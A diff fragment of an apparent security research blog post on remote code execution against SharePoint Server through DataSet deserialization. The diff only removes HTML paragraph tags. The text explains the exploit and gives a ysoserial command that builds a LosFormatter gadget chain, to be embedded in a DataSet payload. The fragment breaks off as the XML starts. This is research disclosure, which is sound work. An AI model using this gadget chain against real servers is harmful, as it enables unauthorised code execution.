sourceincite/sourceincite.github.io/_posts/0000-00-00-sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.md

    at Microsoft.SharePoint.Portal.WebControls.PrivacyItemView.GetQueryResults(Object obj)
 ```

-<p class="cn" markdown="1">You need to find another dangerous static method or setter to call from a type that doesn't use interface members, ~~I leave this as an exercise to the reader, good luck!~~</p>
+You need to find another dangerous static method or setter to call from a type that doesn't use interface members, ~~I leave this as an exercise to the reader, good luck!~~

 ## Remote Code Execution Exploit

-<p class="cn" markdown="1">Ok so I lied.
+Ok so I lied.
 Look the truth is, I just want people to read the full blog post and not rush to find the exploit payload, it's better to understand the underlying technology you know?
 Anyway, to exploit this bug we can (ab)use the `LosFormatter.Deserialize` method since the class contains no interface members.
-To do so, we need to generate a base64 payload of a serialized `ObjectStateFormatter` gadget chain:</p>
+To do so, we need to generate a base64 payload of a serialized `ObjectStateFormatter` gadget chain:

 `c:\> ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c mspaint`

-<p class="cn" markdown="1">Now, we can plug the payload into the following DataSet gadget and trigger **remote code execution** against the target SharePoint Server!</p>
+Now, we can plug the payload into the following DataSet gadget and trigger **remote code execution** against the target SharePoint Server!

 ```xml
 <DataSet>